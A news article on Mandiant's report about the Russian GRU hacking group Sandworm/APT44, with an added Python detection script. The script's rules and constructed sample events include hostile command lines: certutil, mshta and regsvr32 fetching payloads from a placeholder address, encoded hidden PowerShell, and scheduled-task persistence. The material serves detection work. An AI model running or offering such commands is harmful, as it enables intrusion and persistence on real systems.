Sandworm is Russia’s main cyberattack unit in Ukraine

The formidable hacker group Sandworm has played a central role in supporting Russian military objectives in Ukraine over the past two years, even as it has stepped up cyber threat operations in other regions of strategic political, economic and military interest to Russia.

This is the result of analysis of threat actor activities conducted by Google Cloud security group Mandiant. They found that Sandworm – or APT44, as Mandiant has tracked it – is responsible for nearly all of the destructive and disruptive cyberattacks that have occurred in Ukraine since Russia’s invasion in February 2022.

In the process, the threat actor established itself as the leading cyber attack unit within Russia’s Main Intelligence Directorate (GRU) and among all Russian state-backed cyber groups, Mandiant assessed. No other cyber group appears as fully integrated with Russian military operators as Sandworm currently is, the security vendor noted in a report this week that offers a detailed look at the group’s tools, techniques and practices.

“APT44 operations are global in scope and reflect Russia’s wide-ranging national interests and ambitions,” Mandiant warned. “Even with an ongoing war, we have observed the group supporting access and espionage operations in North America, Europe, the Middle East, Central Asia and Latin America.”

One manifestation of Sandworm’s broadening global mandate was a series of attacks earlier this year on three water and hydroelectric facilities in the United States and France by a group calling itself CyberArmyofRussia_Reborn, a persona Mandiant believes is controlled by Sandworm.

The attacks – which appear to have been more of a demonstration of capabilities than anything else – caused a system malfunction at one of the US water facilities attacked. In October 2022, a group Mandiant believes was APT44 deployed ransomware against logistics service providers in Poland in a rare case of deploying a disruptive capability against a NATO country.

Global mandate

Sandworm has been an active threat actor for more than a decade. It is known for numerous high-profile attacks, including the 2022 intrusion that took down sections of the Ukrainian power grid just before a Russian missile strike, the 2017 NotPetya ransomware outbreak and an attack on the opening ceremony of the Pyeongchang Olympic Games in South Korea. The group has traditionally targeted government and critical infrastructure organizations, including those in the defense, transportation and energy sectors. The US government and others have attributed the operation to a cyber unit within the Russian GRU. In 2020, the US Department of Justice indicted several Russian military officers for their alleged roles in various Sandworm campaigns.

“APT44 has an extremely broad targeting mandate,” says Dan Black, principal analyst at Mandiant. “Organizations developing software or other technologies for industrial control systems and other critical infrastructure components should have APT44 at the center of their threat models.”

Gabby Roncone, senior analyst on Mandiant’s Advanced Practices team, includes media organizations among APT44/Sandworm’s targets, especially during elections. “There will be many key elections of great interest to Russia this year, and APT44 may try to be a key player in them,” says Roncone.

Mandiant tracks APT44 as a unit within Russian military intelligence. “We also map out a complex external ecosystem that enables their operations, including state-owned research institutions and private companies,” adds Roncone.

In Ukraine, Sandworm attacks have increasingly focused on espionage aimed at gathering intelligence that benefits Russian military forces on the battlefield, Mandiant said. In many cases the threat actor’s preferred tactic for gaining initial access to targeted networks has been to exploit routers, VPN appliances and other edge infrastructure devices, a tactic it has relied on more and more since Russia’s invasion of Ukraine. While the group has amassed a large collection of bespoke attack tools, it has often relied on legitimate tools and living-off-the-land techniques to evade detection.

An elusive enemy

“APT44 is adept at flying under the detection radar. Creating detections for commonly abused open source tools and living-off-the-land techniques is critical,” says Black.
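As an added illustration of the kind of detection Black describes (this is example code written for this page, not tooling from Mandiant or the report), the block below runs a small set of living-off-the-land rules over constructed Windows process-creation events with Sysmon-style `Image` and `CommandLine` fields. The rules cover generic, widely documented LOLBin abuse patterns (certutil as a downloader, encoded PowerShell, mshta and regsvr32 fetching remote scriptlets, wmic spawning processes, schtasks persisting a script host); they are not APT44-specific indicators, and the hosts, paths and 203.0.113.x addresses in the sample events are made up.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    image: str     # regex matched against the lower-cased image basename
    cmdline: str   # regex matched against the full command line
    note: str


# Generic living-off-the-land detection rules. These are illustrative patterns
# for commonly abused Windows binaries, not indicators tied to any one actor.
RULES = [
    Rule("certutil_download_or_decode", r"^certutil(\.exe)?$",
         r"(?i)-urlcache|-decode|-encode", "certutil used to download or (de|en)code a payload"),
    Rule("powershell_encoded_or_download", r"^(powershell|pwsh)(\.exe)?$",
         r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\b|downloadstring|\biex\b|invoke-expression",
         "PowerShell with an encoded command or in-memory download"),
    Rule("mshta_remote_or_inline", r"^mshta(\.exe)?$",
         r"(?i)https?://|javascript:|vbscript:", "mshta executing remote or inline script"),
    Rule("regsvr32_remote_scriptlet", r"^regsvr32(\.exe)?$",
         r"(?i)/i:https?://|scrobj\.dll", "regsvr32 loading a remote scriptlet"),
    Rule("rundll32_script_or_user_path", r"^rundll32(\.exe)?$",
         r"(?i)javascript:|\\appdata\\|\\temp\\", "rundll32 running script or a DLL from a user-writable path"),
    Rule("bitsadmin_transfer", r"^bitsadmin(\.exe)?$",
         r"(?i)/transfer|/addfile", "bitsadmin used as a downloader"),
    Rule("wmic_process_create", r"^wmic(\.exe)?$",
         r"(?i)process\s+call\s+create", "wmic used to spawn a process"),
    Rule("schtasks_create_script_host", r"^schtasks(\.exe)?$",
         r"(?i)/create.*(powershell|cmd|mshta|wscript|cscript|rundll32)",
         "scheduled task persisting a script host"),
]

# Constructed sample events (not real telemetry). Hosts and addresses are fictitious.
SAMPLE_EVENTS = [
    {"Host": "ws01", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -dump C:\certs\corp-root.cer"},                       # benign
    {"Host": "ws01", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/u.txt C:\Users\Public\u.txt"},
    {"Host": "ws02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"Host": "ws02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},  # benign
    {"Host": "ws03", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://203.0.113.5/a.hta"},
    {"Host": "ws03", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://203.0.113.5/f.sct scrobj.dll"},
    {"Host": "srv01", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic process call create "cmd.exe /c whoami"'},
    {"Host": "srv01", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks /create /sc minute /mo 5 /tn Updater /tr "powershell -nop -w hidden -enc SQBFAFgA"'},
    {"Host": "srv01", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},                           # benign
]


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict, rules=RULES) -> list:
    """Return the names of all rules that match a single process-creation event."""
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    return [r.name for r in rules if re.search(r.image, image) and re.search(r.cmdline, cmd)]


def scan(events, rules=RULES) -> list:
    """Run every rule over every event and return one alert per matching event."""
    alerts = []
    for ev in events:
        hits = evaluate(ev, rules)
        if hits:
            alerts.append({"host": ev.get("Host"), "image": basename(ev.get("Image", "")),
                           "command_line": ev.get("CommandLine", ""), "rules": hits})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a['host']:6} {a['image']:16} {', '.join(a['rules'])}")
```

Six of the nine constructed events trigger a rule; the routine `certutil -dump`, the file-based PowerShell script and the control-panel `rundll32` call do not, which is the point: the rules key on how a legitimate binary is being invoked rather than on its presence. In production these patterns belong in your SIEM or EDR rule language rather than a script, and each one needs tuning against the administrative baseline of the environment, since the same binaries are used legitimately every day.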

Roncone also advocates that organizations map and maintain their network environments and segment networks where possible, given Sandworm’s propensity to target vulnerable edge infrastructure for initial entry and re-entry into environments. “Organizations should also be wary of APT44 rotating between espionage and disruption objectives after gaining access to networks,” Roncone notes. “For those working in the media, and media organizations in particular, digital security training for individual journalists is crucial.”

Black and Roncone see APT44/Sandworm’s use of hacktivist front personas such as CyberArmyofRussia_Reborn as a way to draw attention to its campaigns and to preserve deniability.

“We have seen APT44 repeatedly use the CyberArmyofRussia_Reborn Telegram channel to publish evidence of and draw attention to its sabotage activity,” says Black. “We cannot definitively determine whether this is an exclusive relationship, but we believe that APT44 has the ability to direct and influence what the persona posts on Telegram.”

Black says APT44 could use personas like CyberArmyofRussia_Reborn as a way to avoid direct attribution if they cross a line or provoke a response. “But the second [motive] is that they create a false sense of popular support for Russia’s war – a false impression that the average Russian is organizing to join the cyber fight against Ukraine.”
